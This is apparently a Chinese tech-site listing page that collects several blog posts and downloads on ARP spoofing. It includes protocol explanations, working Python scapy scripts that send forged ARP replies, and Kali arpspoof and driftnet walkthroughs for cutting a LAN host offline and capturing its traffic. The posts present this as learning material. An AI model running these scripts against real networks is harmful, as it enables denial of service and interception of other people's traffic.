精华内容
下载资源
问答
  • ARP欺骗原理+python脚本实现
    2021-11-24 23:02:53

    1.ARP协议工作过程

    假设有两台主机A:192.168.1.1,B:192.168.1.2。当主机A要与主机B通信时,A首先会以广播的方式发送一个ARP请求包,该数据包包含了源IP(192.168.1.1),源MAC(A),目标IP(192.168.1.2),目标MAC(ff:ff:ff:ff:ff:ff),B收到广播包后会先将A的IP与MAC地址记录到自己的ARP缓存表中,然后给A单播回复ARP replay包,该数据包包含了源IP(192.168.1.2),源MAC(B),目标IP(192.168.1.1),目标MAC(A),A收到该数据包后会将B的IP和MAC记录到自己的ARP缓存中,之后与B的通讯查询缓存即可。

    2.ARP欺骗原理

    由于ARP是无状态协议,所以当一台主机收到一个ARP响应包后不会检查自己是否发送过ARP请求,而是直接将该条记录加载到ARP缓存表中或更新原记录。这样就可以利用向目标主机发送大量的ARP响应包导致目标主机的ARP缓存一致处于错误记录状态,从而达到ARP欺骗目的

    2.1单向欺骗

    单向欺骗是只对目标主机或者网关发起ARP欺骗,攻击者只需要将自己伪装成网关或者一台主机向局域网内其他主机发送ARP响应报文即可

    2.1双向欺骗

    攻击者同时欺骗网关和目标主机,对网关说我是A,对A说我是网关,那么A与网关之间的流量都要经过攻击者的电脑,他们之间的数据也都将被攻击者截获。

    3.利用脚本实现ARP攻击

    from scapy.all import *
    import time
    
    
    def ethernet(targetIP):
        eth = Ether()
        eth.dst = getmacbyip(targetIP)
        eth.type = 0x0806
        return eth
    
    
    def arpPacket(targetIP):
        arp = ARP()
        arp.hwlen = 6
        arp.plen = 4
        arp.op = 2
        arp.psrc = conf.route.route()[2]
        arp.hwdst = getmacbyip(targetIP)
        arp.pdst = targetIP
        return arp
    
    
    def sendPacket(targetIP):
        eth = ethernet(targetIP)
        arp = arpPacket(targetIP)
        packet = eth / arp
        sendp(packet)
    
    
    if __name__ == '__main__':
        targetIP = input("Please input target ip: ")
        while True:
            sendPacket(targetIP)
            time.sleep(0.5)
    
    
    更多相关内容
  • Winpcap4.0基础上开发的ARP攻击代码,仅学习网络协议之用,否则后果自负. 如有问题可以联系Westmoon@yeah.net 或者 登陆博客http://blog.csdn.net/xiaoy233/留言
  • 本次用代码实现的是ARP网关欺骗,通过发送错误的网关映射关系导致局域网内其他主机无法正常路由。使用scapy中scapy.all模块的ARP、sendp、Ether等函数完成包的封装与发送。一个简单的ARP响应报文发送: eth = Ether...
  • arp欺骗实现断网

    2021-07-11 17:30:11
    本篇文章将介绍如何用arp欺骗实现断网的操作 首先要明白什么是arp以及什么是arp欺骗。因为局域网内是通过mac地址来识别对方的,而获取对方mac地址的时候可以实现欺骗,导致被攻击者获取的是攻击者的mac地址,误以为...

    本篇文章将介绍如何用arp欺骗实现断网的操作

    首先要明白什么是arp以及什么是arp欺骗。因为局域网内是通过mac地址来识别对方的,而获取对方mac地址的时候可以实现欺骗,导致被攻击者获取的是攻击者的mac地址,误以为攻击者的电脑是他想要发送信息的目标。而这里主要还是用了arpspoof工具,他可以将网关mac替换为攻击者mac(mac就是指网卡地址),然后攻击者可截获受害者发送和收到的数据包,可获取受害者账户、密码等相关敏感信息。具体可以参考(5条消息) ARP原理和ARP攻击_天行健,君子以自强不息-CSDN博客_arp这篇文章。

    在开始之前先确定kali是否安装了arpspoof,如果没有安装,参考(5条消息) Kali源 + 2020Kali没有arpspoof_是大方子-CSDN博客(科普一下apt是一个应用管理工具,apt是本地存了一份软件包信息的列表,比如软件大小,版本号,依赖等。也就是说apt update是更新这个列表,如果不更新,可能你安装的软件的时候安装成了老版本。)

    下面是具体步骤:

    首先查看自己的ip是什么

    可以看到我们的网卡是eth0,ip是192.168.0.110

    然后需要知道网关的ip是什么以及想要攻击的目标ip,可以用route -n看到所在网关的ip也可以用nmap -sP 192.168.0.*或者nmap -sP 192.168.0.0/24来扫描局域网内存在的主机

    注意用nmap的时候要有root权限

    这里让ip为192.168.0.113为攻击目标。先ping一下看ping的通吗,ping不通把防火墙关了试试

    这里是可以的(还要注意,如果攻击的目标是在虚拟机里面,一定要将网络设置为桥接模式才可以)

     先将目标打开一个网站试试,也是可以的

    接下来就实现断网攻击了,在kali里输入arpspoof -i 网卡 -t 被攻击主机的ip地址 当前网关地址

    再看被攻击目标

    已经被成功断网。

    也可以通过查看被攻击者网关的物理地址是否变成了攻击者的物理地址来验证

     

    可以看到网关的物理地址变成了攻击者的物理地址,那么这台机器每次发送请求,都会到这台机器上面去。想要取消断网ctrl+c就可以。

    断网的原理也很简单:

    在此之前我们已经了解到,arp欺骗的原理。而在此案例中,我们分析总结得知:受攻击计算机要想连接到局域网之外的网络,就必需要此局域网下的网关ip地址,通过网关ip地址得到对应的mac地址,根据mac地址通过网关,获得与局域网外界计算机建立连接,最终达到上网的目的。
    不防大家,大胆试想一下,如果我们将arp缓存表中网关ip地址所对应的mac地址,修改为黑客计算的mac地址。并且,黑客计算机收到受控计算机的请求之后,没有继续将请求发送给网络,也没有将收到的信息转发给受控计算机。这样,就到达了对受控计算机断网的目的。
    而以上案例的arp断网攻击,就是这一种方法。
     

     最后一个问题,就是我用kali(A)对另一台电脑(B)实现断网的时候,发现不止B被断了网,A以及他的真机也被断网了。原因是因为 B通信时会检查每次的MAC是否一样,不一样永远更新为最后一个,所以应该是arpspoof这个工具也在不断发送arp包来保证自己是最后一个,因为虚拟机的网也和真机是有关的,当虚拟机发送大量arp响应包时,网络中产生大量的arp通信量使网络堵塞,不断更改目标主机的arp缓存中IP-MAC条目,所以自己的网被占用了大量资源也会变得很慢。

    展开全文
  • 使用python实现arp欺骗

    千次阅读 2022-04-30 07:45:56
    实验拓扑: 1.首先进行ping测试网关和kali,来...3.查看欺骗后的arp表,R1和PC1都认为对方的mac地址是7B-26,也就是kali的mac python脚本: import sys import time from scapy.all import sendp, AR...

    实验拓扑:

    1.首先进行ping测试网关和kali,来获取mac地址

    ping 192.168.72.131

    ping 192.168.72.20

    MAC地址对应结果如下:

    2.进行使用脚本中间人欺骗,脚本放在最后

    3.查看欺骗后的arp表,R1和PC1都认为对方的mac地址是7B-26,也就是kali的mac

     python脚本:

    import sys
    import time
    from scapy.all import sendp, ARP, Ether
    
    if len(sys.argv) != 3:
        print(sys.argv[0] + ":<target_IP> <spoof_ip>")
        sys.exit()
    
    victimIP = sys.argv[1]  # 接收第二个参数:target_IP
    gatewayIP = sys.argv[2]
    packet = Ether() / ARP(psrc=gatewayIP, pdst=victimIP)  # 封装一个二层的ARP包,进行欺骗
    
    while True:
        sendp(packet)   # 发送包
        time.sleep(3)
        print(packet.show())

    展开全文
  • ARP欺骗的简单实现

    千次阅读 多人点赞 2018-12-02 22:58:20
    说到ARP欺骗,就不得不提OSI模型,它的知识量过于巨大,我都学不过来(叹气),不过慢慢积累吧。 ARP协议(地址解析协议(英语:Address Resolution Protocol)是属于链路层的,很多东西我还不懂。。。 我先讲讲我对...

    先瞎扯一波

    说到ARP欺骗,就不得不提OSI模型,它的知识量过于巨大,我都学不过来(叹气),不过慢慢积累吧。
    ARP协议(地址解析协议(英语:Address Resolution Protocol)是属于链路层的,很多东西我还不懂。。。
    我先讲讲我对ARP欺骗的一些理解吧:

    对于一台计算机来说,在错综复杂的网络世界,要识别它,有两个重要的识别卡,即“ip地址”和“MAC地址”,我把计算机就叫做小明吧:),MAC地址看做小明的学号(00:0c:29:90:f9:91),ip地址看做小明的座位号(192.168.40.128),小明入学后有了自己的学号,这个学号不出意外是不会改变的,而在班上,小明可能随时会调位置,他的座位号是可能会变化的,小明的学号和座位号在班上都是独一无二的,其他同学也是。

    计算机就是这样,有着独一无二的MAC地址和ip地址,mac地址一般在生产的时候就确定了,而IP地址则是可以随时更改的,连不同的网就有不同的IP地址,比如我在家连的WiFi和在学校连的WiFi,我的电脑的ip是不同的,但mac地址是不会变的。那么计算机是怎样上网的呢?它怎么就可以浏览网页获取信息呢?这就要提到网关,通俗点讲就是我们的路由器,连WiFi时都少不了它,我们要浏览网页啥的都要向网关打招呼,需要网关的帮助下才能得到网页信息。假设老师就是网关(座位号一般是讲台:192.168.40.2,老师学工号有:00:50:56:fb:f4:14),小明上课想上厕所了,就必须跟老师请求,老师点头了,他才能出去。

    简单说一下计算机上网的一个流程:

    (假设计算机要去百度网页,这是一个不断发送数据包和接受数据包的过程,发包必须要有接受者的MAC地址)

    步骤1、(计算机发出询问网关MAC地址)计算机要找到网关:谁是192.168.40.2 >>>>小明要找老师:座位号为192.168.40.2的老师是哪个

    步骤2、(网关收到询问,作出应答)网关回应:192.168.40.2是在00:50:56:fb:f4:14>>>>老师回应:座位号为192.168.40.2的老师的学工号为:00:50:56:fb:f4:14

    步骤3、计算机得到了网关mac地址,就开始封包,发包给网关>>>>小明知道老师的学工号,就可以跟这个学工号的老师说自己的请求

    步骤4、网关得知这个请求包要发送至百度那,就给百度那发包>>>>老师知道小明要去上厕所,就跟打扫厕所的阿姨说小明要去那上厕所

    步骤5、百度得到请求包就返回网关一个应答包>>>>打扫厕所的阿姨得到老师的消息后,就跟老师说可以上厕所

    步骤6、网关要把应答包发给计算机,需要计算机的MAC地址:谁是192.168.40.128>>>老师得到消息后就问:谁的座位号是192.168.40.128

    步骤7、计算机收到询问,发现自己就是192.168.40.128,就做出回应给网关:192.168.40.128在00:0c:29:90:f9:91>>>小明发现自己就是在192.168.40.128,就把自己的学号告诉老师

    步骤8、网关的到计算机的MAC地址,就可以把应答包再封装一下发给计算机>>>老师是知道小明的学号了,就告诉学号为00:0c:29:90:f9:91的同学可以去上厕所了

    步骤9、计算机收到应答包,可以看到百度网页了>>>小明得到老师的消息,就可以去上厕所了

    以上差不多就是上网的基本流程了,不太专业,不好意思了,各位。

    ARP欺骗原理

    本来计算机与网关两个亲密无间,这是候有个第三者插足,攻击者主机,我叫他小强(学号[MAC地址]:00:0c:29:89:ce:8f 座位号[IP地址]:192.168.40.131)

    1、攻击者假装自己是网关:步骤2中本来网关告诉计算机它的MAC地址是: 00:50:56:fb:f4:14,但是攻击者主机却不断地告诉计算机网关的MAC地址是:00:0c:29:89:ce:8f (攻击者主机自己的MAC地址),这样的话,计算机在步骤3中封包,再发包就不是发给网关了,而是发给攻击者主机,如果攻击者主机不对计算机法老的包做处理,计算机就无法得到回应,也就无法上网了,实现了断网攻击。(小强骗小明自己就是老师,小明就向小强请求,小强不理会他的请求,小明就上不了厕所了)

    2、攻击者假装自己是计算机:步骤7中攻击者主机因为都在同一局域网内,也收到了网关的询问,本来计算机告诉网关他的MAC地址是:00:0c:29:90:f9:91 ,但是攻击者却不断地告诉网关计算机的mac地址是:00:0c:29:89:ce:8f (攻击者主机自己的MAC地址),这样步骤8网关封包后发包就不再是发给计算机,而是发给攻击者主机了,攻击者不把包再发给计算机,计算机仍然无法得到回应,也就上不了网。(小强骗老师说自己就是小明,老师把消息发给小强,小强不告诉小明老师给的消息,小明还是上不了厕所)

    操作环境

    我在虚拟机上装了kali和另外一台计算机,本来想用kali攻击宿主机(win10),但是貌似宿主机和虚拟机之间还有一个网关,太麻烦了,就直接在虚拟机上装了两台,另一台是被攻击者,便于操作,kali上的python都是2的。

    python代码

    #这里假装攻击者是网关
    from scapy.all import *
    interface='eht0'  #接口类型
    tip='192.168.40.128' #计算机的IP地址,被攻击者
    aip='192.168.40.131' #攻击者的IP地址
    gip='192.168.40.2' #网关IP地址
    tmac=getmacbyip('tip') #被攻击者的MAC地址
    amac=getmacbyip('00:0c:29:89:ce:8f') #攻击者的MAC地址
    pack=Ether(src=amc,dst=tmac)/ARP(hwsrc=amac,psrc=gip,hwdst=tmac,pdst=tip,op=2)#本来hwsrc应该是网关的MAC地址,攻击者换成了他自己的MAC地址
    '''
    公式:pack=Ether(src=攻击者MAC地址,dst=目标MAC地址)/ARP(hwsrc=攻击者MAC地址,psrc=要假装谁就是谁的IP地址,hwdst=目标MAC地址,pdst=目标IP地址,op=2)
    '''
    while 1:
    	sendp(pack)
    

    被攻击者还没被攻击前是这样的:
    在这里插入图片描述
    网关(192.168.40.2)MAC地址:00:50:56:fb:f4:14
    在这里插入图片描述
    ping baidu是通的,可以上网

    攻击者发动攻击:
    在这里插入图片描述
    受害者它被攻击后:
    在这里插入图片描述
    网关mac地址变成了攻击者mac地址
    在这里插入图片描述
    已经断网了

    kali工具arpspoof攻击

    arpspoof -i <网卡名> -t <欺骗的目标> <假装是谁>
    

    这里假装是网关
    在这里插入图片描述
    效果和python代码攻击是一样的,就不展示了

    如果对拦截的包进行处理,受害者仍然能上网,只不过他上网的内容就被攻击者抓取到了
    处理一下:

    echo 1  >/proc/sys/net/ipv4/ip_forward
    

    运用driftnet工具:
    在这里插入图片描述
    在这里插入图片描述
    受害者浏览网页的图片就被抓到了

    ps:如果您看到这,非常感谢您的观看,如果那里有错,希望路过能加以指正,非常感谢!

    展开全文
  • ARP欺骗实现

    2013-07-06 09:37:50
    ARP欺骗是用处很大的一个技术,我们的路由器整天在欺骗我们的PC,没有这个欺骗我们就不能上网。 AD:2013大数据全球技术峰会低价抢票中 ARP欺骗是用处很大的一个技术,我们的路由器整天在欺骗我们的PC,没有这个欺骗...
  • 目前网络上类似P2P终结者这类软件,主要都是基于ARP欺骗实现的,网络上到处都有关于ARP欺骗的介绍,不过为了本文读者不需要再去查找,我就在这里大概讲解一下
  • arp欺骗原理实验

    2017-05-06 17:06:03
    arp欺骗实验
  • 本文在模拟网络攻击实验环境中,使用Python的scapy模块构造ARP数据包发送给目标机进行ARP欺骗,成功实施了中间人攻击,然后嗅探局域网内部网络流量,截取HTTP协议数据包进行解析,初步实现了在被攻击者浏览网页点击...
  • Kali Linux ARP欺骗攻击局域网 首先 什么是ARP欺骗?   ARP欺骗(英语:ARP spoofing),又称ARP毒化(ARP poisoning,网络上多译为ARP病毒)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术,通过欺骗...
  • 实现arp欺骗的源代码以及详细解释

    热门讨论 2010-12-01 21:53:45
    实现TCP/IP协议的网络环境下,一个ip包走到哪里,要怎么走是靠路由表定义,但是,当ip包到达该网络后,哪台机器响应这个ip包却是靠该ip包中所包含的硬件mac地址来识别。也就是说,只有机器的硬件mac地址和该ip包中...
  • 新建文件夹_arp欺骗_

    2021-10-02 17:57:16
    根据 ARP 欺骗的原理,设计网管欺骗程序,编写代码实现对内网 PC 的欺骗。 首先检索网络设备列表,遍历并将所有的设备列表打印出来,选择所要欺骗的网 络设备打开其适配器,判断链路层类型是否为以太网,存下子网...
  • Python实现ARP欺骗

    千次阅读 2019-04-02 17:41:50
    实验目的:局域网段扫描,利用arp欺骗抓包获取...ARP欺骗攻击就利用了这点,攻击者主动发送ARP报文。通过不断发送这些伪造的ARP报文,让局域网上所有的主机和网关ARP表,其对应的MAC地址均为攻击者的MAC地址,这样所...
  • 网上看到的一篇介绍ARP工具编程的,虽然比较老了,但是有很好的参考价值,ARP的原理与详细的代码实现,切莫去做坏事
  • ARP欺骗原理及实现

    2014-05-04 10:13:55
    描述ARP的主要协议格式以及ARP的主要原理,介绍了ARP欺骗的主要原理和模拟实现过程。
  • arp欺骗 C#实现arp欺骗

    热门讨论 2010-02-04 22:13:07
    arp欺骗 C#实现arp欺骗arp欺骗 C#实现arp欺骗arp欺骗 C#实现arp欺骗
  • ARP欺骗实现,可对局域网主机进行ARP欺骗操作和欺骗解除操作,MFC界面。
  • arp欺骗C++实现

    2011-10-15 16:34:10
    arp欺骗原理及实现 用c++实现 无界面控制台程序
  • ARP路由欺骗并利用

    2021-10-20 18:54:05
    文章目录一、什么是ARP二、ARP欺骗原理三、ARP欺骗实现,嗅探利用使用arpspoof实施中间人攻击中间人攻击还原目标机访问的图片中间人攻击抓取目标机访问的URL地址中间人攻击抓取目标机提交的密码中间人攻击抓取目标机...
  • ARP欺骗攻击的根源在于ARP协议在设计时认为局域网内部的所有用户都是可信的,当攻击者渗透进入内网后,通过向局域网内缓存中注入伪造的IP/MAC映射关系,从而进行欺骗,成为局域网内的中间人,即可以监听并进一步篡改...
  • ARP欺骗原理与模拟

    2019-06-18 15:05:37
    一 什么是ARP协议? ARP协议是“Address Resolution Protocol”(地址解析协议)的缩写。在局域网中,网络中实际传输的是“帧”,帧里面是有目标主机的MAC地址的。在以太网中,一个主机要和另一个主机进行直接通信,...
  • 相比于之前的arp欺骗程序 修正了程序堆栈溢出的问题,添加了winpcap开发库,自动获取往电脑设置的网关(只需修改适配器名称),并且可以在网卡列表选择指定网卡发送数据包
  • 嗅探器(sniffer)   ...因为在交换式局域网中,网络中的数据并不会经过每一台主机的网卡,所以对于交换式局域网,就要用另外一种更为主动的方法去嗅探,那就是基于ARP欺骗的嗅探。  &nb
  • ARP欺骗——断网攻击

    千次阅读 2021-06-07 18:23:24
    网页也无法打开 QQ下线、网络也不能访问 停止攻击Ctrl+z,或者直接关闭终端也行 停止攻击之后,稍等片刻,网络又重新恢复,就能上网了 好了,以上就是ARP——断网攻击的全部内容,通过伪装网关来欺骗目标主机,...
  • 一文了解ARP欺骗

    2021-05-19 19:56:14
    学习ARP欺骗,这也是很古老的渗透手段了,主要起着信息收集的作用,比如你可以利用欺骗获取对方的流量,从流量分析你认为重要的信息,例如某某账号密码。或是利用Arp攻击,切断局域网内某一用户的网络访问(单向欺骗...
  • #include #include #include #include #include #include #include #include #include #include "arp_attack.h"void send_request_arp (addr_t *head){short DGT_MAC[] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};...
  • linux下实现ARP欺骗

    2021-09-25 00:15:07
    linux ettercap+...linux环境实现ARP欺骗:https://blog.csdn.net/weixin_41983681/article/details/85813498 linux原始套接字抓取网络数据包:https://blog.csdn.net/haoyuxuanyuan/article/details/10686685

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 12,973
精华内容 5,189
关键字:

arp欺骗实现